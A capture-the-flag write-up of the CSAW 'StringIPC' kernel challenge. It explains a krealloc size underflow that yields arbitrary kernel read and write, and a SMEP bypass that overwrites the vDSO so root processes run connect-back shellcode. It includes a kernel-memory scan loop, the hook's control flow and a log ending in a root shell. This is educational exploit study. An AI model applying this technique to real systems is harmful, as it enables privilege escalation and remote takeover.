This year at CSAW Finals there were a few kernel challenges. The one I will be solving in this post is StringIPC by Michael Coppola.
We are given a 64-bit Ubuntu 14.04.3 VM running a 3.13 kernel with SMEP, kptr_restrict, and dmesg_restrict enabled. A kernel module, "StringIPC", is loaded, and its source is provided in the home directory. You can view the source here, and I will inline some important parts in this post.

Analyzing the Kernel Module
The StringIPC module implements a basic interprocess communication system: processes issue ioctls on the device at /dev/csaw to store data in, and read data from, different channels. There are 8 different ioctl codes which can be used to create, modify, and read/write to a channel:
#define CSAW_IOCTL_BASE     0x77617363

CSAW_ALLOC_CHANNEL allows you to allocate a new channel and a new buffer with a given size while CSAW_GROW_CHANNEL and CSAW_SHRINK_CHANNEL use krealloc to change the size of the channel's buffer. CSAW_READ_CHANNEL and CSAW_WRITE_CHANNEL read and write to the memory buffer that has been allocated for the channel at an offset set by CSAW_SEEK_CHANNEL. Finally CSAW_OPEN_CHANNEL and CSAW_CLOSE_CHANNEL deal with which channel the ioctl interacts with.
The bug lies in the use of krealloc in realloc_ipc_channel:
static int realloc_ipc_channel ( struct ipc_state *state, int id, size_t size, int grow )
{
    struct ipc_channel *channel;
    size_t new_size;
    char *new_data;

    channel = get_channel_by_id(state, id);
    if ( IS_ERR(channel) )
        return PTR_ERR(channel);

    if ( grow )
        new_size = channel->buf_size + size;
    else
        new_size = channel->buf_size - size;   /* no check that size <= buf_size */

    new_data = krealloc(channel->data, new_size + 1, GFP_KERNEL);
    if ( new_data == NULL )
        return -EINVAL;

    channel->data = new_data;
    channel->buf_size = new_size;

    ipc_channel_put(state, channel);

    return 0;
}

If we shrink the channel buffer by 1 more than its current size, new_size underflows. Since it is a size_t, it wraps to SIZE_MAX (all bits set). When krealloc is called, 1 is added, and the value overflows back to 0. From the source of krealloc, we see that if new_size is 0, it returns ZERO_SIZE_PTR:
void *krealloc(const void *p, size_t new_size, gfp_t flags) {
    void *ret;

    if (unlikely(!new_size)) {
        kfree(p);
        return ZERO_SIZE_PTR;
    }
    /* ... */
}

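ZERO_SIZE_PTR is defined as ((void *)16). ZERO_SIZE_PTR is not NULL, so the error check in realloc_ipc_channel passes, and after our resize channel->data = 0x10 and channel->buf_size = SIZE_MAX. Every offset is now within bounds, so by seeking to some offset from 0x10 we get arbitrary read and write in kernelspace.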
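
The wraparound is easy to check in userspace. The following is a minimal sketch of the arithmetic only, not code from the module: shrunk_size, alloc_request, seek_offset_for, and ZERO_SIZE_ADDR are illustrative names, and a 64-bit size_t is assumed to match the target.

```c
#include <stddef.h>
#include <stdint.h>

/* The kernel defines ZERO_SIZE_PTR as ((void *)16). */
#define ZERO_SIZE_ADDR ((uintptr_t)16)

/* Mirrors the shrink branch: buf_size - size with no bounds check.
 * Unsigned subtraction wraps around when size > buf_size. */
static size_t shrunk_size(size_t buf_size, size_t size)
{
    return buf_size - size;
}

/* Mirrors the size handed to krealloc: new_size + 1.
 * SIZE_MAX + 1 wraps to 0. */
static size_t alloc_request(size_t new_size)
{
    return new_size + 1;
}

/* Offset to seek to so that data + offset == target when data == 0x10. */
static size_t seek_offset_for(uintptr_t target)
{
    return (size_t)(target - ZERO_SIZE_ADDR);
}
```

For an 8-byte channel, shrunk_size(8, 9) yields SIZE_MAX and alloc_request(SIZE_MAX) yields 0, which is the value that makes krealloc return ZERO_SIZE_PTR.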

Exploiting the Arbitrary Write
Now that we have our read and write, we can start crafting an exploit. SMEP is on, so we cannot just overwrite a kernel pointer and jump to userspace to execute prepare_kernel_cred/commit_creds shellcode. To bypass this we can overwrite the vDSO so that another process running as root executes our connect-back shellcode.

The idea here is that vDSO is mapped to both kernelspace and to the virtual memory of every process, including ones running as root. This is done to help speed up calls to specific syscalls which do not require context switching to work correctly. vDSO is mapped as R/X in userspace, but R/W in kernelspace. This allows us to modify it from the kernelspace, and have it executed by users in userspace.
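
The userspace half of this can be observed from any process. The sketch below is not part of the exploit: it asks the C library where the vDSO is mapped in the current process and checks that the mapping starts with the ELF magic. It assumes Linux with a libc that provides getauxval() (glibc 2.16 or later); own_vdso_has_elf_magic is an illustrative name.

```c
#include <string.h>
#include <sys/auxv.h>

/* Returns 1 if this process has a vDSO that starts with the ELF magic,
 * 0 if a vDSO is advertised but does not start with it, and
 * -1 if the kernel did not advertise a vDSO at all. */
static int own_vdso_has_elf_magic(void)
{
    /* AT_SYSINFO_EHDR holds the base address of the vDSO image. */
    unsigned long base = getauxval(AT_SYSINFO_EHDR);
    if (base == 0)
        return -1;
    return memcmp((const void *)base, "\177ELF", 4) == 0;
}
```

The same ELF image is what the kernel-side search later in this post looks for.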
There are a few steps to using this technique:
1. Gain arbitrary write and read
2. Locate vDSO in kernel space
3. Create connect-back shellcode for root processes
4. Overwrite parts of vDSO with our shellcode
5. Listen for our connect-back for our root shell.
We already have step 1 from exploiting the StringIPC module, so the next step is to locate vDSO at runtime.

Locating vDSO
Below is the kernel code for initializing the vDSO pages in kernel space.
static int __init init_vdso_vars(void) {
    int npages = (vdso_end - vdso_start + PAGE_SIZE - 1) / PAGE_SIZE;
    int i;
    char *vbase;

    vdso_size = npages << PAGE_SHIFT;
    vdso_pages = kmalloc(sizeof(struct page *) * npages, GFP_KERNEL);
    if (!vdso_pages)
        goto oom;
    for (i = 0; i < npages; i++) {
        struct page *p;
        p = alloc_page(GFP_KERNEL);
        if (!p)
            goto oom;
        vdso_pages[i] = p;
        copy_page(page_address(p), vdso_start + i*PAGE_SIZE);
    }

    vbase = vmap(vdso_pages, npages, 0, PAGE_KERNEL);
    /* ... */
}

The vDSO pages are allocated in kernel space with alloc_page, and the page pointers are stored in the vdso_pages array. There are a few ways to locate these pages. If you are able to read /proc/kallsyms, you may be able to find vdso_pages and read the addresses from it directly. However, that is not the case for this challenge. A second way is to check the start of every page in kernelspace for the ELF header that begins the vDSO image. We can further narrow down the candidate pages by using signatures from vDSO. Here is my code to do that:
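unsigned long header = 0;
unsigned long loc;
/* read_kernel() and SIG_OFFSET are placeholders: the arbitrary-read wrapper
   (seek + read ioctls) and the signature's offset within the page. */
for (loc = 0xffffffff80000000UL; loc < 0xffffffffffffafffUL; loc += 0x1000) {
    read_kernel(loc, &header, 8);
    /* "\x7fELF" followed by 64-bit, little-endian, version 1 */
    if (header == 0x010102464c457fUL) {
        fprintf(stderr, "%p elf\n", (void *)loc);
        //Look for 'clock_ge' signature (may not be at this offset, but happened to be)
        read_kernel(loc + SIG_OFFSET, &header, 8);
        if (header == 0x65675f6b636f6c63UL) {
            fprintf(stderr, "%p found it?\n", (void *)loc);
            break;
        }
    }
}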
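
The matching logic can be tried out on an ordinary buffer. The sketch below is a userspace variant under stated assumptions, not the exploit code: it scans a byte buffer in place of kernel memory, and it searches each candidate page for the "clock_ge" bytes anywhere in the page rather than at one fixed offset. find_vdso_page, load_le64, and PAGE_SZ are illustrative names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PAGE_SZ 0x1000u

/* "\x7fELF", ELFCLASS64 (2), ELFDATA2LSB (1), EV_CURRENT (1), then a zero
 * byte, read as one little-endian 64-bit word. */
#define ELF64_LE_MAGIC UINT64_C(0x00010102464c457f)

/* Assemble 8 bytes into a 64-bit value, least significant byte first. */
static uint64_t load_le64(const unsigned char *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* Returns the offset of the first page that starts with the ELF magic and
 * also contains the bytes "clock_ge" (0x65675f6b636f6c63 when read as a
 * little-endian word), or -1 if no page matches. */
static long find_vdso_page(const unsigned char *mem, size_t len)
{
    for (size_t off = 0; off + PAGE_SZ <= len; off += PAGE_SZ) {
        const unsigned char *page = mem + off;
        if (load_le64(page) != ELF64_LE_MAGIC)
            continue;                      /* not an ELF image */
        for (size_t i = 8; i + 8 <= PAGE_SZ; i++)
            if (memcmp(page + i, "clock_ge", 8) == 0)
                return (long)off;          /* ELF header plus signature */
    }
    return -1;
}
```

Searching the whole page costs more reads per candidate, but only pages that already passed the ELF check are searched, and it avoids depending on where the symbol name happens to sit in a particular kernel build.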

Now that we have found vDSO we can create our shellcode to overwrite it.

Connect-Back Shellcode
The connect-back shellcode can be a relatively general x86-64 shellcode, with a few modifications. The first modification is to only create the connect-back shell for root processes. Since every process that calls gettimeofday will trigger our code, we don't want to be spammed with connections from non-root processes. We can call syscall 0x66 (sys_getuid) and compare the result against 0. If it is not 0, we instead call syscall 0x60, which is sys_gettimeofday, so that the caller still gets the result it expected. Along the same lines, even if we are a root process, we don't want to crash things, so we fork with syscall 0x39. In the parent we do the same sys_gettimeofday forwarding, but in the child we run our connect-back.
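
The control flow described above can be written out in C for readability. This is only a sketch of the decision logic, not the shellcode itself: it uses the libc wrappers in place of raw syscalls, and payload_placeholder is a hypothetical stand-in that simply exits where the real child would connect back and execute a shell.

```c
#include <stddef.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical stand-in for the connect-back payload. */
static void payload_placeholder(void)
{
    _exit(0);
}

/* C rendering of the hook's control flow. */
static int hooked_gettimeofday(struct timeval *tv, struct timezone *tz)
{
    if (getuid() == 0) {              /* shellcode: syscall 0x66 */
        pid_t pid = fork();           /* shellcode: syscall 0x39 */
        if (pid == 0)
            payload_placeholder();    /* child only; does not return */
    }
    /* Non-root callers, the root parent, and a failed fork all fall
     * through to the real call (shellcode: syscall 0x60). */
    return gettimeofday(tv, tz);
}
```

Forwarding to the real call on every path is what keeps the hijacked process working normally, so the overwrite does not draw attention by breaking whatever called gettimeofday.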

The assembly for the shellcode I used can be found here. It connects back on port 3333 and executes "/bin/sh".
One last thing we should do is dump the vDSO and check the offset at which gettimeofday is located. Once we know that, we can overwrite this location with our shellcode and wait for some root process to call it. I set up a simple cron job to help guarantee one would. My final code can be found here. Here is a run of it:
csaw@team7:~$ id
uid=1000(csaw) gid=1000(csaw) groups=1000(csaw)
csaw@team7:~$ ./a.out 
allocate fd: 3 ret: 0 id:1
Shrink: 0 err:0
0xffffffff817bc000 elf
0xffffffff817d1000 elf
0xffffffff81b6c000 elf
0xffffffff81b9e000 elf
0xffffffff81c03000 elf
0xffffffff81c03000 found it?
Listening on [] (family 0, port 3333)
Connection from [] port 3333 [tcp/*] accepted (family 2, sport 58568)
uid=0(root) gid=0(root) groups=0(root)

Final Notes
vDSO is not the only memory mapped to both kernelspace and userspace. On x86-64, vSYSCALL serves a similar function to vDSO, but also has the advantage of being in the same location on every reboot (which may be predictable from the kernel version as well). However, kernel.vsyscall64 was not enabled on this challenge, so calls were passed to vDSO instead. If vm.vdso_enable is also set to 0, then vDSO will also be bypassed and the libc wrappers will default to the normal syscalls.

vDSO/vSYSCALL overwriting is also a useful technique that can be used by exploits in interrupt context as it does not require a local process to map memory or to gain elevated credentials.

This solution was not the only way to solve this challenge. The solution by the author can be found here.